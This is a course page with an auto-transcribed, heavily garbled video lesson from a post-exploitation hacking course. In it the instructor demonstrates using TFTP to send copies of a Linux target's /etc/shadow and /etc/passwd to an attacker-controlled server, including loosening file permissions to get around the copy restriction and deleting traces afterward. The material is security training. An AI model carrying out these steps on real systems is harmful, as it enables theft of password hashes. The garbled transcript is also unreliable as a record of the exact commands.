Time
7 hours 47 minutes
Difficulty
Advanced
CEU/CPE
10

Video Description

This lesson focuses on Trivial file transfer protocol (Tftp). This lesson teaches participants step by step instructions on using the Tftp command. Tftp can be used to send files out to the target Tftp server and to push out password and shadow files.

Video Transcription

00:04
Hello, viewers. Ah, this video is a bit of an aside from the rest of the program, it's not actually part of the
00:10
information gathering or the back door ing or the covering tracks. But it's something that I wanted to take time to cover very quickly because, like the slides that I had a beginning of this the lecture portion.
00:21
Ah, this is something that you're going to want to know what you're working on. This sort of thing at this specific thing I am talking about is T f T p u. I'm sure you've heard of FTP,
00:32
which is file transfer protocol ity. FTP is just the trivial wire transfer fire file transfer protocol. It's ah, the UDP version. It doesn't use much checking and
00:42
it's a little bit less reliable, but it is good for being stealthy.
00:46
So
00:47
just to demonstrate how it works,
00:50
I went ahead and created a file which is just this text dot text,
00:54
and we're going to drop that on two.
00:57
The fire machine on which I currently have a T F TV server running. What you would be doing is on whether you're outside machine was the handle the tools and things on it that you wanted. You would just set that up with whatever your favorite FTP server might be or t ftp server might be. There's some great open tours out with great open sources out there checking out, get hubs. Where's forwards. Anything like that
01:15
is a great way to find them.
01:18
So you've got that set up on your farm machine, huh?
01:23
And then on this on your target in this case will use linen ex biggest and easy set up, and I can demonstrate it very quickly.
01:32
So you have to 50 feet,
01:34
and then you just hit enter,
01:37
and it brings up a special problem. Which is the tea ftp prompt. I'm as
01:41
far fewer commands to get help in this one. To find out what the Commander, you just put a question mark.
01:47
Ah, you see, Connect mode put. Get quick. Riposte. Trace status mine area. Asking its owner.
01:53
Uh, what's the first thing we're gonna want to do is
01:57
we're both mode on.
01:59
We're gonna go ahead and do it. Connect Now. These can be abbreviated, so all you need is actually the first letter. I tend to write a few letters in Just that. I know what I'm talking about. You can keep track.
02:09
We're gonna connect to that. We're going to connect to the TV reports 69 which is just
02:15
what's configured on the farm machine. You can configure it to any port. This actually isn't the native TFT port, but that's not important.
02:23
So we're going to connect to that.
02:25
And then we're gonna go ahead into a put. So put is to send files out
02:31
your call. We've been doing the totally not hacking your stuff, not text file for a while.
02:37
Once you've finished all of that, you gathered all the data you want.
02:40
Then you obviously put this in there.
02:45
You would put that file on your target, the FTP server.
02:50
So you do put, you see, it sent 10 bites. It was just a quick little bit to show you that it sends it and it shows you what it's actually doing.
02:58
And then we're gonna exit this.
03:00
We're gonna exit T f T p.
03:02
Do it clear.
03:06
You see, that file obviously is still here. We're gonna change that. Remove it.
03:09
So we condone straight getting
03:15
So you're back in RTL TV. We
03:20
But for most bone back on, we can act still 19 to 1 to save one's a 71
03:24
69
03:27
And we get
03:30
this text,
03:30
not tost.
03:34
All right, we got it. So then we quit out.
03:38
Clear,
03:38
Clear. There we go.
03:40
And l s and sure enough, the files back
03:45
and thats useful in handy in terms of this sort of vague concept. But
03:49
what about something a little bit more interesting? Maybe getting rid of the earth may be pushing out the password in shadow files.
03:57
Well,
03:59
these files are Lennox native files files that pretty much everyone should know about.
04:03
Um, two. They didn't really cover in our information gathering step
04:08
just because I showed you where you would find those files. And generally speaking, going into this, it's sort of expected that you'll know
04:15
about those particular password files.
04:17
Um,
04:18
but in case you aren't aware of what they are
04:21
shadow, which is the etc shadow, opa, etc. Shadow file.
04:28
We're heading less that
04:30
well, pseudo it.
04:32
So you have to have. I've been at this delicate shadow, which is important because you can see
04:36
he contains password. Hash is
04:41
which is very handy you also see that on this generic computer machine? There are lots of things that I don't actually have passwords, you know, whatever.
04:49
So you see a password hash right here
04:53
and ah, that's basically
04:56
well, it's not basically, that's just how the passwords are stored. It will hash the password you entered when you're trying to verify as being someone specific.
05:04
And that's how it will compare to see if you got the right password.
05:09
That's the password,
05:11
Funnily enough,
05:12
does not contain passwords.
05:14
Contains user names, groups, all sorts of information about that. But it has an X where the password hash would be located.
05:21
It also contains your default shell
05:25
on all sorts of fun. You user i d group i d et cetera.
05:29
So
05:30
we're gonna go ahead new, sooty FTP
05:33
we're gonna do put what we're gonna do a connect first
05:39
192168 Once in zone one,
05:43
they're gonna try putting etc shadow.
05:48
So that's kind of an interesting problem that you run into with That's a shadow
05:55
and it's fast word.
05:57
His lineage doesn't want you to do that. You can't just straight drop those. So what you gotta do
06:02
is
06:04
copy
06:11
area
06:12
and make sure we're using the right commands were gonna copy.
06:15
That's the shadow
06:18
shadow, not t X c.
06:21
Well,
06:25
then we're going to copy
06:30
password to password. But T esti Now notice here. And this is another useful little quick clinics trick that you want to check out
06:39
in this one. We type the full path and this one just type the relative path.
06:43
The difference is simple. This is so that we can address something that in another
06:46
place in the overall directory, where is this?
06:49
We'll just drop it into our current directory so we don't have to move her up.
06:55
So he left to make sure they're both here.
06:57
Cool, they are. And we opened back up. Artie ftp
07:00
BC one and $216817.1 that one.
07:09
And we put
07:11
password dot t x t shadow dot t x c.
07:16
Let's go ahead and change that. So what I actually just did, rather than what I intended to d'oh
07:21
was actually Ah, put 25 Put that file
07:26
under a different name on the far server so we'll do it this way. So we actually have it a Rio put
07:31
shadow dot t x c
07:38
So since I made a boo boo, I'm gonna have to do shadow one dot t x c.
07:43
There we go.
07:48
Anything can happen on a live show, folks,
08:01
including Ah, fun little permissions problem.
08:05
So why are we running into that?
08:09
Well, let's see,
08:11
this is another example. Another case where we can
08:13
do some linens, food, learned some interesting stuff,
08:18
and we see that the shadow is owned and controlled by route.
08:24
So now we've got to do something little fancy.
08:26
This is a commode.
08:28
It actually is a password change.
08:33
Now, there are lots of very specific, very careful things you should be doing. You should understand what each of these means if you're going to be changing permission so that you can precisely change it
08:43
and make sure you don't mess up any file information or put anything where it shouldn't be.
08:46
You should always be very, very careful. And you should not do
08:50
what I'm about to do,
08:52
which is to wholesale change shadow dot t x t
08:56
to full permissions.
09:00
So we do. L s tak l s I A. This time we'll grab for shadow
09:07
and we see that it is willing to do anything we tell it, it will attempt to execute this file, which tends to go poorly. But we can try it out,
09:13
as you can see tends to go poorly.
09:16
But we know that we're allowed to touch it now. So maybe that will fix our problem.
09:22
T f T p b c
09:31
p
09:33
shadow dot
09:35
text.
09:35
All right,
09:37
so it looks like it worked. Everything seems to be
09:41
good to go.
09:41
Let's see,
09:45
We're going to remove shadow dot text.
09:48
We're going to remove password, not text.
09:58
Do it
09:58
Grip
10:01
for everything, not text.
10:03
And we see only our old file that we downloaded a little bit ago is there.
10:07
All right,
10:09
so
10:09
that's all good to go. And we're ready set. So we're gonna do t f t p one more time.
10:16
Make sure we can actually see And to get those files back,
10:24
get
10:26
shadow dot t x t
10:28
get password t X T
10:33
and quit.
10:41
And you see that with the FTP And I mentioned before that it's supposedly ah,
10:48
low
10:48
reliability particle one that doesn't take too much care and making sure it's got the right thing But you see that it came through just fine. In general, most of your software, most of your tools are gonna come through without any problems.
11:01
Data transfer over the short network space is not typically very hard, and you're not gonna have a problem with it. But again, you did see
11:07
you have to be works, and it is very useful for sending and receiving vials. We also got to do a little bit of linens learning while we were in the process, just so you could get a sense of what passed files to look after,
11:18
Um,
11:18
and just to kind of get a sense of where everything's stored.
11:22
So with that, I pretty well leave you on this video. And I think
11:26
you're pretty well ready to go with the FTP. Obviously, if you're uncomfortable with it or even if you are comfortable with it, but you'd like to be more comfortable with it. Go ahead and download your own server, run your own client and kind of play around with it and see how it works.
11:41
It will be an invaluable tool to you as you go forward in the post exploitation world.
11:46
With that, I'm residents me, Joseph, very signing off until next time. I hope you learned a bunch

Up Next

Post Exploitation Hacking

In this self-paced online training course, you will cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting.

Instructed By

Instructor Profile Image
Joe Perry
Senior Technical Instructor at FireEye, Inc
Instructor